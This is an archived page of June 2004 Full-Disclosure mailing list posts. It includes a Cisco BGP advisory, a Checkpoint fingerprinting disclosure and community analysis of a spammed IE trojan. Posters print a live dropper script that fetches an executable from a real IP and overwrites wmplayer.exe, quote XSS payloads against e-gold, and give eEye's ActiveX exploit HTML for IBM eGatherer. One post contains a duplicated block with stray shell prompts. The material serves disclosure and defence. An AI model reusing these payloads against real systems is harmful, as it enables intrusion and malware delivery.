existing agreement with third-party support organizations such as Cisco
Partners, authorized resellers, or service providers should contact that
support organization for assistance with the upgrade, which should be free of
charge.

Customers without Service Contracts

Customers who purchase direct from Cisco but who do not hold a Cisco service
contract and customers who purchase through third-party vendors but are
unsuccessful at obtaining fixed software through their point of sale should get
their upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC
contacts are as follows.

  * +1 800 553 2447 (toll free from within North America)
  * +1 408 526 7209 (toll call from anywhere in the world)
  * e-mail: taccisco.com

Please have your product serial number available and give the URL of this
notice as evidence of your entitlement to a free upgrade. Free upgrades for
non-contract customers must be requested through the TAC.

Please do not contact either "psirtcisco.com" or "security-alertcisco.com"
for software upgrades.

See http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional
TAC contact information, including special localized telephone numbers and
instructions and e-mail addresses for use in various languages.

Customers may only install and expect support for the feature sets they have
purchased. By installing, downloading, accessing or otherwise using such
software upgrades, customers agree to be bound by the terms of Cisco's software
license terms found at http://www.cisco.com/public/sw-license-agreement.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.

Workarounds
===========

The effectiveness of any workaround is dependent on specific customer
situations such as product mix, network topology, traffic behavior, and
organizational mission. Due to the variety of affected products and releases,
customers should consult with their service provider or support organization to
ensure any applied workaround is the most appropriate for use in the intended
network before it is deployed.

For additional information regarding BGP security risk assessment, mitigation
techniques, and deployment best practices, please consult ftp://
ftp-eng.cisco.com/cons/isp/security/BGP-Risk-Assesment-v.pdf.

BGP MD5

Under normal circumstances, due to inherent security factors in the TCP
protocol such as sequence number checks, it is difficult but possible to forge
an appropriate packet to exploit this problem. Configuring your Cisco IOS
device for BGP MD5 authentication is a valid workaround to protect the
vulnerable device.

This can be configured as shown in the following example:

router(config)# router bgp
router(config-router)# neighbor <IP_address> password <enter_your_secret_here>

It is necessary to configure the same shared MD5 secret on both peers and at
the same time. Failure to do so will break the existing BGP session and the new
session will not get established until the exact same secret is configured on
both devices. For a detailed discussion on how to configure BGP, refer to the
following document:

http://www.cisco.com/en/US/products/sw/iosswrel/ps1828/products_configuration_guide_chapter09186a00800ca571.html

Once the secret is configured, it is prudent to change it periodically. The
exact period must fit within your company security policy but it should not be
longer than a few months. When changing the secret, again it must be done at
the same time on both devices. Failure to do so will break your existing BGP
session. The exception is if your Cisco IOS software release contains the
integrated CSCdx23494 fix on both sides of the connection. With this fix,
the BGP session will not be terminated when the MD5 secret is changed only
on one side. The BGP updates, however, will not be processed until either
the same secret is configured on both devices or the secret is removed from
both devices.

Infrastructure Access Control Lists

Although it is often difficult to block traffic transiting your network, it is
possible to identify traffic which should never be allowed to target your
infrastructure devices and block that traffic at the border of your network.
Infrastructure ACLs are considered a network security best practice and should
be considered as a long-term addition to good network security as well as a
workaround for this specific vulnerability. The white paper entitled
"Protecting Your Core: Infrastructure Protection Access Control Lists" presents
guidelines and recommended deployment techniques for infrastructure protection
ACLs:

http://www.cisco.com/warp/public/707/iacl.html

Exploitation and Public Announcements
=====================================

The research which led to this vulnerability being discovered was announced in
a public announcement at NANOG in June 2003. The Cisco PSIRT team is not aware
of any malicious use of the vulnerabilities described in this advisory. We were
made aware of this issue through internal testing as well as notification from
a research team at the University of California at Santa Barbara.

The Cisco PSIRT is not aware of any malicious use of the vulnerability
described in this advisory.

Status of This Notice: FINAL
=====================

This Advisory is provided on an "as is" basis and does not imply any kind of
guarantee or warranty of any kind. Your use of the information on the Advisory
or materials linked from the Advisory is at your own risk. Cisco reserves the
right to change or update this notice at anytime.

Distribution
============

This advisory will be posted on Cisco's worldwide website at
http://www.cisco.com/warp/public/707/cisco-sa-20040616-bgp.shtml.

In addition to worldwide web posting, a text version of this notice is
clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail
and Usenet news recipients.

  * cust-security-announcecisco.com
  * first-teamsfirst.org (includes CERT/CC)
  * bugtraqsecurityfocus.com
  * vulnwatchwulnwatch.org
  * ciscospot.colorado.edu
  * cisco-nsppuck.nether.net
  * full-disclosurelists.netsys.com
  * comp.dcom.sys.cisconewsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's worldwide
website, but may or may not be actively announced on mailing lists or
newsgroups. Users concerned about this problem are encouraged to check the
above URL for any updates.

Revision History
================

+---------------------------------------------+
| Revision | 16-June-2004 | Initial Public |
| 1.0 | | Release |
+---------------------------------------------+

Cisco Security Procedures
=========================

Complete information on reporting security vulnerabilities in Cisco products,
obtaining assistance with security incidents, and registering to receive
security information from Cisco, is available on Cisco's worldwide website at
http://www.cisco.com/warp/public/707/sec_incident_response.shtml. This includes
instructions for press inquiries regarding Cisco security notices. All Cisco
security advisories are available at http://www.cisco.com/go/psirt.

- -------------------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.2

iQA/AwUBQNBRC3sxqM8ytrWQEQLpGQCgiM8vHSFNW9SOGbvyOWN6qRvHWxAAn08R
66EU/1ILdWzJMUxjqJKBy1B2
=YmJU
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

RE: [Full-Disclosure] spamming trojan?

From: Geo. (geoincidentsnls.net)
Date: Wed Jun 16 2004 - 09:06:52 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

>>
The end stage appears to be a new variant of the Cjdra proxy trojan.
This person has been spreading trojans via spammed-exploit for a while
now, and now it looks as if he/she has upgraded to the latest IE
exploit.
<<

Am I correct in assuming that this is using the as yet still unpatched IE
exploit and that this is a little more serious than installing adware?

Where the heck are Microsoft and Scot "Information Anarchy" Culp and the
Trusted Computing Forum now? Don't be blaming customers for not visiting
windows update this time.

Geo.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] Re: Antivirus/trojan

From: Paul (onesteptoyahoo.com.au)
Date: Wed Jun 16 2004 - 10:46:44 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

It is the Win32/Zafi.B worm.

one step at a time...

---------------------------------
Find local movie times and trailers on Yahoo! Movies.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] (no subject)

From: Bill Cerynik (billvcconsulting.biz)
Date: Wed Jun 16 2004 - 10:59:33 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

AMEN!!! Preach it, brother!

Best regards,
Bill Cerynik
Managing Partner

VC Consulting LLC
973.616.8170
billvcconsulting.biz
http://www.vcconsulting.biz

>Message: 12
>Date: Tue, 15 Jun 2004 14:52:11 -0400
>From: Len Rose <lennetsys.com>
>To: full-disclosurelists.netsys.com
>Subject: [Full-Disclosure] Administrivia: Classical Rant
>
>ATTENTION LAMERS
>
> Speaking for myself only, something has to be done
> about the quality of the information, and the standards
> of netiquette on this list.
>
> We all don't need to see mindlesS banter, and other noise
> spewing back and forth. If you can, please try to not post
> this spewage to the list, but instead send mail to each other
> (after carefully cutting and pasting on your windows desktop)
>
> If you must send it to the list it must be in terms of
> technical content, whether it is of a real security issue
> and not if Yahoo will increase your disk space or what slashdorks
> posted about something that was known since 2 months ago.
>
> I use the word technical loosely as in my mind, anything
> security related is inherently technical even if it/is not
> actually dealing with code or networks or systems.
>
> I'm very sick of seeing the amount of lame crap on this list,
> and I imagine a great deal of others are too.
>
> Thanks for listening.
>
> PS Unlike other "reputable" lists, we try not to censor
> anyone if they at least subscribe and never hit the
> queue. Lately we default to "delete" and try to approve
> those people who insist on posting without subscribing,
> or posting from a non-subscribed address. If "reputable"
> means bugtraq or cert then beat me with a stick.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] spamming trojan?

From: Paul Schmehl (paulsutdallas.edu)
Date: Wed Jun 16 2004 - 12:33:16 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

--On Wednesday, June 16, 2004 08:23:59 AM -0400 "Geo."
<geoincidentsnls.net> wrote:

> Received a spam this morning claiming I have a voicemail with the link
> (warning do not click the link)
>
> http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)
>
> which brings up a frames based page with one of the frames containing this
>
> function InjectedDuringRedirection(){
>
> showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;di
> alo gHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT
> SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'><\/script>'";
>
> Anyone want to try and analyze what this thing is? It was spammed to about
> 30 addresses here this morning.
>
All this does is call more functions:

function getRealShell() {
myiframe.document.write("<SCRIPT
SRC='http://219.234.95.124/vbox/shellscript.js'><\/SCRIPT>");
}

document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=200
HEIGHT=200></IFRAME>");
setTimeout("getRealShell()",100);

The real action is at the "RealShell" address:

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://219.234.95.124/vbox/w_e_d.exe",0);
x.Send();

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";

The rest should be fairly obvious from the above code.

Paul Schmehl (paulsutdallas.edu)
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Akamai

From: Paul Schmehl (paulsutdallas.edu)
Date: Wed Jun 16 2004 - 12:23:35 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

--On Wednesday, June 16, 2004 11:53:23 AM +1000 Darren Reed
<avaloncaligula.anu.edu.au> wrote:
>
> This is a whole new play ground for organised crime, mostly thanks
> to Microsoft. You've got millions of PC's around the world that
> are largely, in one way or another, susceptible to computer virii,
> making them open targets for use as minions. And the perfect seed
> for spreading them is the databases of email addresses used by
> spammers...
>
If networks simply took responsibility for the traffic that comes from
them, this problem wouldn't exist. It's completely trivial to find
infected hosts on a network through passive monitoring. They should then
be disconnected until they are properly cleaned and secured.

Unless networks begin doing this routinely (including ISPs), legislation
will be introduced to "solve" the problem, and then we will all be much
worse off. There's nothing like a law to completely screw things up.

Paul Schmehl (paulsutdallas.edu)
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

RE: [Full-Disclosure] Antivirus/Trojan/Spyware scanners DoS!

From: Pratik Mehta (PMehtasoa.org)
Date: Wed Jun 16 2004 - 12:24:54 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

The shell code is located at

http://219.234.95.124/vbox/shellscript.js

and Macafee points it out as:

VBS/Psyme - Trojan

-Pratik

>>> "Geo." <georgernls.net> 6/16/2004 7:22:48 AM >>>
Received a spam this morning claiming I have a voicemail with the link
(warning do not click the link)

http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)

which brings up a frames based page with one of the frames containing this

function InjectedDuringRedirection(){

Anyone want to try and analyze what this thing is? It was spammed to about
30 addresses here this morning.

Geo.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] Checkpoint Firewall-1 IKE Vendor ID information leakage

From: Roy Hills (Roy.Hillsnta-monitor.com)
Date: Wed Jun 16 2004 - 09:45:29 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Checkpoint Firewall-1 IKE Vendor ID information leakage

Introduction:

Checkpoint Firewall-1 version 4.1 and later with IPsec VPN enabled will
return an IKE Vendor ID payload when it receives an IKE packet with
a specific Vendor ID payload. The Vendor ID payload that is returned
identifies the system as Checkpoint Firewall-1 and also determines the
Firewall-1 version and service-pack or feature-pack revision number.
This is an information leakage issue which can be used to fingerprint
the Firewall-1 system.

This information leakage issue has been verified for Checkpoint Firewall-1
versions from 4.1 (no service pack) to NG AI R55 inclusive. Firewall-1
version 4.0 is not vulnerable because it does not return any Vendor ID
payload, and Firewall-1 versions 3.0b and earlier are not vulnerable
because they do not support IPsec VPN. However, most people are running
either NG or 4.1 and therefore this issue will apply to most Firewall-1
installations that have IPsec VPN enabled.

I used ike-scan v1.6 (http://www.nta-monitor.com/ike-scan/) to discover
and demonstrate this issue.

Full details are available at:
http://www.nta-monitor.com/news/checkpoint2004/index.htm

Details:

If an IKE Phase-1 packet with a Vendor ID payload containing the data
"f4ed19e0c114eb516faaac0ee37daf2807b4381f" (20 bytes of binary data
encoded as hex) is sent to a Firewall-1 system running Firewall-1 v4.1
or higher which supports IKE, the Firewall will respond with a Vendor ID
payload containing data which identifies it as a Checkpoint Firewall-1
system, provides details about the version of the Firewall software,
and contains some additional information.

The data that is returned in the Vendor ID payload from the
Firewall consists of the same 20-byte sequence that was sent
(f4ed19e0c114eb516faaac0ee37daf2807b4381f) followed by another 20-bytes
of data that contains the encoded version number and some other details
that appear to contain details of the Firewall's capabilities.

I presume that the 20-byte "magic string" is an SHA1 hash of something.
I'd be interested to find out what source string hashes to this value.

Looking at all versions of Firewall-1 from 4.1 base (no service pack) to
NG AI R55 (latest current version), I have found the following returned
Vendor ID payloads. In the payloads below, a dot (".") represents an
arbitary hex digit:

Firewall-1 4.1 Base (no service pack)
f4ed19e0c114eb516faaac0ee37daf2807b4381f00000001000000020000000000000000....0000

Firewall-1 4.1 SP1
f4ed19e0c114eb516faaac0ee37daf2807b4381f00000001000000030000000000000000....0000

Firewall-1 4.1 SP2-SP6 (SP2, 3, 4, 5, and 6 return the same Vendor ID)
f4ed19e0c114eb516faaac0ee37daf2807b4381f0000000100000fa20000000000000000....0000

rshradon [537]$
rshradon [537]$
rshradon [537]$
rshradon [537]$ cat ,,
[Note to moderator: I notified Checkpoint of this issue on 13th April
2004, but have not received any response apart from a "We've received
your Email" auto-reply.]

Introduction:

I used ike-scan v1.6 (http://www.nta-monitor.com/ike-scan/) to discover
and demonstrate this issue.

Full details are available at:
http://www.nta-monitor.com/news/checkpoint2004/index.htm

Details:

I presume that the 20-byte "magic string" is an SHA1 hash of something.
I'd be interested to find out what source string hashes to this value.

Firewall-1 4.1 Base (no service pack)
f4ed19e0c114eb516faaac0ee37daf2807b4381f00000001000000020000000000000000....0000

Firewall-1 4.1 SP1
f4ed19e0c114eb516faaac0ee37daf2807b4381f00000001000000030000000000000000....0000

Firewall-1 4.1 SP2-SP6 (SP2, 3, 4, 5, and 6 return the same Vendor ID)
f4ed19e0c114eb516faaac0ee37daf2807b4381f0000000100000fa20000000000000000....0000

Firewall-1 NG Base
f4ed19e0c114eb516faaac0ee37daf2807b4381f00000001000013880000000000000000....0000

Firewall-1 NG FP1
f4ed19e0c114eb516faaac0ee37daf2807b4381f00000001000013890000000000000000....0000

Firewall-1 NG FP2
f4ed19e0c114eb516faaac0ee37daf2807b4381f000000010000138a0000000000000000....0000

Firewall-1 NG FP3
f4ed19e0c114eb516faaac0ee37daf2807b4381f000000010000138b0000000000000000....0000

Firewall-1 NG AI R54
f4ed19e0c114eb516faaac0ee37daf2807b4381f000000010000138c0000000000000000....0000

Firewall-1 NG AI R55
f4ed19e0c114eb516faaac0ee37daf2807b4381f000000010000138d0000000000000000....0000

The version part is given in character positions 53 - 56 inclusive.
E.g. "138d" (decimal 5005) for NG AI R55.

Here's an example using ike-scan v1.6 with an NG FP2 Firewall. Here,
we are specifying RSA authentication with --auth=3 to get the Firewall
to handshake as well as providing the Firewall-1 Vendor ID:

$ ike-scan --vendor=f4ed19e0c114eb516faaac0ee37daf2807b4381f --auth=3 -M
172.16.2.2
Starting ike-scan 1.6 with 1 hosts (http://www.nta-monitor.com/ike-scan/)
172.16.2.2 Main Mode Handshake returned
SA=(Enc=3DES Hash=SHA1 Auth=RSA_Sig Group=2:modp1024
LifeType=Seconds LifeDuration(4)=0x00007080)
VID=f4ed19e0c114eb516faaac0ee37daf2807b4381f000000010000138a000000000000000018800000
(Firewall-1 NG FP2)

Ending ike-scan 1.6: 1 hosts scanned in 0.009 seconds (108.96 hosts/sec).
1 returned handshake; 0 returned notify

Here is a second example fingerprinting an NG AI R54 Firewall using
hybrid authentication (--auth=64221):

$ ike-scan --vendor=f4ed19e0c114eb516faaac0ee37daf2807b4381f --auth=64221
-M 172.16.2.2
Starting ike-scan 1.5.3 with 1 hosts (http://www.nta-monitor.com/ike-scan/)
172.16.2.2 Main Mode Handshake returned
         SA=(Enc=3DES Hash=SHA1 Auth=64221 Group=2:modp1024
         LifeType=Seconds LifeDuration(4)=0x00007080)
         VID=f4ed19e0c114eb516faaac0ee37daf2807b4381f000000010000138c000000000000000018800000
(Firewall-1 NG AI R54)

References:

http://www.nta-monitor.com/news/checkpoint2004/index.htm Issue details
http://www.nta-monitor.com/ike-scan/ ike-scan tool
--
Roy Hills Tel: +44 1634 721855
NTA Monitor Ltd FAX: +44 1634 721844
14 Ashford House, Beaufort Court,
Medway City Estate, Email: Roy.Hillsnta-monitor.com
Rochester, Kent ME2 4FA, UK WWW: http://www.nta-monitor.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] spamming trojan?

From: joe smith (joejoesmith.homeip.net)
Date: Wed Jun 16 2004 - 13:25:19 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I used PE Explorer.

Looks the june4.exe is some kind of spyware. It reference to another
site "cjdra.com", possibly uploading user information there.

I just started learning assembly, please pardon my lack of knowledge on
reverse engineering.

Michael Gargiullo wrote:

>On Wed, 2004-06-16 at 13:41, joe smith wrote:
>
>
>>The file is UPX packed and withit the file there is another "GET"
>>pointing to "http://219.234.95.124/june4.exe"
>>
>>J
>>
>>
>
>Like those Chinese stacking dolls... How'd you unpack it?
>
>
>
>
>>Michael Gargiullo wrote:
>>
>>
>>
>>>On Wed, 2004-06-16 at 08:23, Geo. wrote:
>>>
>>>
>>>
>>>
>>>>Received a spam this morning claiming I have a voicemail with the link
>>>>(warning do not click the link)
>>>>
>>>>http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)
>>>>
>>>>which brings up a frames based page with one of the frames containing this
>>>>
>>>>
>>>>
>
>
>
>>>> function InjectedDuringRedirection(){
>>>>
>>>>showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialo
>>>>gHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT
>>>>SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'><\/script>'";
>>>>
>>>>Anyone want to try and analyze what this thing is? It was spammed to about
>>>>30 addresses here this morning.
>>>>
>>>>Geo.
>>>>
>>>>
>>>>
>>>>
>>>Here's the contents:
>>>
>>>var x = new ActiveXObject("Microsoft.XMLHTTP");
>>>x.Open("GET", "http://219.234.95.124/vbox/w_e_d.exe",0);
>>>x.Send();
>>>
>>>var s = new ActiveXObject("ADODB.Stream");
>>>s.Mode = 3;
>>>s.Type = 1;
>>>s.Open();
>>>s.Write(x.responseBody);
>>>
>>>s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
>>>location.href = "mms://";
>>>
>>>so whatever w_e_d.exe is...
>>>
>>>_______________________________________________
>>>Full-Disclosure - We believe in it.
>>>Charter: http://lists.netsys.com/full-disclosure-charter.html
>>>
>>>
>>>
>>>
>>>
>
>
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] RE: [ GLSA 200406-10 ] Gallery: Privilege escalation vulnerability

From: Bob Walton (bobitsecsystems.com)
Date: Wed Jun 16 2004 - 10:57:55 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

You all might want to take a look at Americas best kept secret, security for
wireless internet (we have been doing it for 5 years)would truly value your
opinion. Bob Walton 877-326-5990 bobitsecsystems.com

-----Original Message-----
From: Thierry Carrez [mailto:koongentoo.org]
Sent: Tuesday, June 15, 2004 3:14 PM
To: gentoo-announcelists.gentoo.org
Cc: bugtraqsecurityfocus.com; full-disclosurelists.netsys.com;
security-alertslinuxsecurity.com
Subject: [ GLSA 200406-10 ] Gallery: Privilege escalation vulnerability

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

  Severity: Normal
     Title: Gallery: Privilege escalation vulnerability
      Date: June 15, 2004
      Bugs: #52798
        ID: 200406-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

There is a vulnerability in the Gallery photo album software which may
allow an attacker to gain administrator privileges within Gallery.

Background
==========

Affected packages
=================

Description
===========

Impact
======

Attackers may gain full access to all Gallery albums. There is no risk
to the webserver itself, or the server on which it runs.

Workaround
==========

There is no known workaround at this time. All users are encouraged to
upgrade to the latest available version.

Resolution
==========

All users should upgrade to the latest available version of Gallery.

# emerge sync

# emerge -pv ">=app-misc/gallery-1.4.3_p2"
# emerge ">=app-misc/gallery-1.4.3_p2"

References
==========

[ 1 ] Gallery Announcement

http://gallery.menalto.com/modules.php?op=modload&name=News&file=article&sid
=123&mode=thread&order=0&thold=0

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200406-10.xml

Concerns?
=========

License
=======

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFAz0qMvcL1obalX08RAmuoAKCKcyWXNtt+mdgtX26R9l96V8yE4QCfVFQG
9s9GiyiY83X/VHcx2Kc+mQQ=
=+z9+
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

application/msword attachment: email_intro_letter.doc

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] RE: MAGIC XSS INTO THE DNS: coelacanth

From: Drew Copley (dcopleyeEye.com)
Date: Wed Jun 16 2004 - 13:29:52 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

> -----Original Message-----
> From: Windows NTBugtraq Mailing List
> [mailto:NTBUGTRAQLISTSERV.NTBUGTRAQ.COM] On Behalf Of
> http-equivexcite.com
> Sent: Tuesday, June 15, 2004 3:00 PM
> To: NTBUGTRAQLISTSERV.NTBUGTRAQ.COM
> Subject: MAGIC XSS INTO THE DNS: coelacanth
>
> Tuesday, June 15, 2004
>
> The following courtesy of 'bitlance winter' adds an entirely new
> dimension to the matter and also suggest some additional
> peculiarities at play:
>
> <a href='http://"><plaintext>.e-gold.com'>foo</a>
>
> <a href='http://"><script>alert()<%
> 2Fscript>.e-gold.com'>foo</a>
>
> these will inject arbitrary html and script into the site in the
> context of the 'intranet zone', which means one no longer needs
> to go out and setup a site with the dns issue, all one needs to
> do is locate a functioning site, include their code into a
> suitable url, either direct the target via that or place an
> iframe elsewhere pointing to it.

Because the wildcarding is a bit too wild.

For instance, "http://&money.e-gold.com/ " resolves.

And, "http://&money;G-Money&OGbabyOG.e-gold.com/" resolves.

In e-gold's case, they actually take the url line and render
it variously in their dynamic html on their page.

>
> Still unclear how or why this can be interpreted into the site
> or through the browser.
>
> credit: 'bitlance winter'
>
>
> End Call
>
> --
> http://www.malware.com
>
> -----
> NTBugtraq Editor's Note:
>
> Want to reply to the person who sent this message? This list
> is configured such that just hitting reply is going to result
> in the message coming to the list, not to the individual who
> sent the message. This was done to help reduce the number of
> Out of Office messages posters received. So if you want to
> send a reply just to the poster, you''ll have to copy their
> email address out of the message and place it in your TO: field.
> -----
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Akamai

From: Ron DuFresne (dufresnewinternet.com)
Date: Wed Jun 16 2004 - 14:13:09 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Might as well toss in egress filtering to prvent many of the abuses of
spoofing that happen in the present env of the internet. The ISP and
others will claim that this is far too costly for their routers to handle,
but, for the vast majority of sites, this is likely to not be as costly as
the network folks are claiming as a way to avoid doing a tad bit more work
in their router configs. Some of the worst sites for spoofing abuses, and
those that have networkies that will complain the loudest, are the .edu's.

Thanks,

Ron DuFresne

[SNIP]

> >
> If networks simply took responsibility for the traffic that comes from
> them, this problem wouldn't exist. It's completely trivial to find
> infected hosts on a network through passive monitoring. They should then
> be disconnected until they are properly cleaned and secured.
>
> Unless networks begin doing this routinely (including ISPs), legislation
> will be introduced to "solve" the problem, and then we will all be much
> worse off. There's nothing like a law to completely screw things up.
>
> Paul Schmehl (paulsutdallas.edu)
> Adjunct Information Security Officer
> The University of Texas at Dallas
> AVIEN Founding Member
> http://www.utdallas.edu/ir/security/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

OK, so you're a Ph.D. Just don't touch anything.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Akamai

From: Peter van den Heuvel (peterbank-connect.com)
Date: Wed Jun 16 2004 - 14:26:45 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Paul Schmehl wrote:
> If networks simply took responsibility for the traffic that comes from
> them, this problem wouldn't exist.
Indeed. DNS's, AS's and what not else is required to make the internet
tick; all is centrally controlled and delegated. What's missing is a
flanking reverse of resposibilities. It's idiotic that providers or even
full countries can completely ignore / reject any complaint without
having their AS or DNS taken down.

> Unless networks begin doing this routinely (including ISPs), legislation
> will be introduced to "solve" the problem, and then we will all be much
> worse off. There's nothing like a law to completely screw things up.
Amen!

Peter

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] "IBM Access Support" (eGatherer) Activex Dangerous Methods Vulnerability

From: Drew Copley (dcopleyeEye.com)
Date: Wed Jun 16 2004 - 13:47:55 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

"IBM Access Support" (eGatherer) Activex Dangerous Methods Vulnerability

Release Date:
June 15, 2004

Date Reported:
February 20, 2004

Patch Development Time (In Days):
116

Severity:
High (Remote Code Execution)

Vendor:
IBM

Systems Affected:
IBM Access Support (eGatherer) Activex Version 2.0.0.16

Overview:
eEye Digital Security has discovered a security vulnerability in IBM's
signed "eGatherer" activex. Because this application is signed, it might
be presented to users on the web for execution in the name of IBM. If
users trust IBM, they will run this, and their systems will be
compromised. This activex was designed by IBM to be used for an
automated support solution for their PC's. This is installed by default
on many popular IBM PC models.

The issue is quite simple. Activex is a very profound web technology. As
a profound web technology it may be abused. Designers might create an
activex which could perform any function on an user's computer.
Microsoft relies on trust for the security model and warns against
making activex with dangerous capabilities. The responsibility, however,
rests with the creator of the activex, as in any trust model.

In this case, IBM made available methods named such as "GetMake",
"GetModel", "GetOSName", "SetDebugging" (accepting variable called
"filename") and "RunEgatherer" (also accepting suspicious parameter).
These dangerous methods were found to be able to write a trojan file to
the user's startup folder through a difficult trick.

It should be further noted that both "SetDebugging" and "RunEgether"
methods allow a web page author to write files of their choice (though
the content is limited) to the victim's hard drive -- anywhere to their
hard drive. These are the default and clearly stated usage of these
methods.

Technical Details:
For clarification purposes this will be presented as a two page attack,
though it may easily be a single HTML page attack.

-----------EXAMPLE HTML 1 ---------
//first this page would be viewed, then through refreshing or whatever
one goes to the second page (or just timing the two calls with
SetTimeOUt and putting them on the same page...)
|object classid="clsid:74FFE28D-2378-11D5-990C-006094235084" id="X"|
|object|

|script|
X.SetDebugging("/../xx.hta",-1);
|script|
---------------------------------

-----------EXAMPLE HTML 2 ---------
|object classid="clsid:74FFE28D-2378-11D5-990C-006094235084" id="X"|
|object|

|script|
X.SetDebugging("/../x<iframe src=http://www.malware.com>x.hta",-1);
|script|

---------------------------------

In the above example, we see the object called utilizing the "object"
tag. The codebase tag [not shown here] is used by the browser to
initiate the install of the activex if it is not already existing on the
system. This would bring up the activex prompt which essentially asks
the user if they trust IBM. Finally, the object is named "X", so we
might reference it later in script and use its' dangerous methods.

In the first page we call the "SetDebugging" method. "SetDebugging"
writes a file called "xx.hta" to the C:\ drive. (An attacker would
probably write the file to the StartUP folder in real life.) This file
will have "xx.hta" written inside of it, along with some other stuff.

We need to control what is written inside the file so we can write
dangerous scripting. But, all we can write is what can be in a filename.

Now, the second HTML page is called. What happens? The application
throws an error, but before it crashes, it writes our exploit code to
the file "xx.hta". (It crashes because "<>" are not valid characters for
a filename).

So, now we have the exploit file in the exploit location with the
exploit location within it... and the target system is taken down.

Protection:
Retina Network Security Scanner has been updated to identify this
vulnerability.

Vendor Status:
IBM has released a patch for this vulnerability. The patch is available
at the following location:
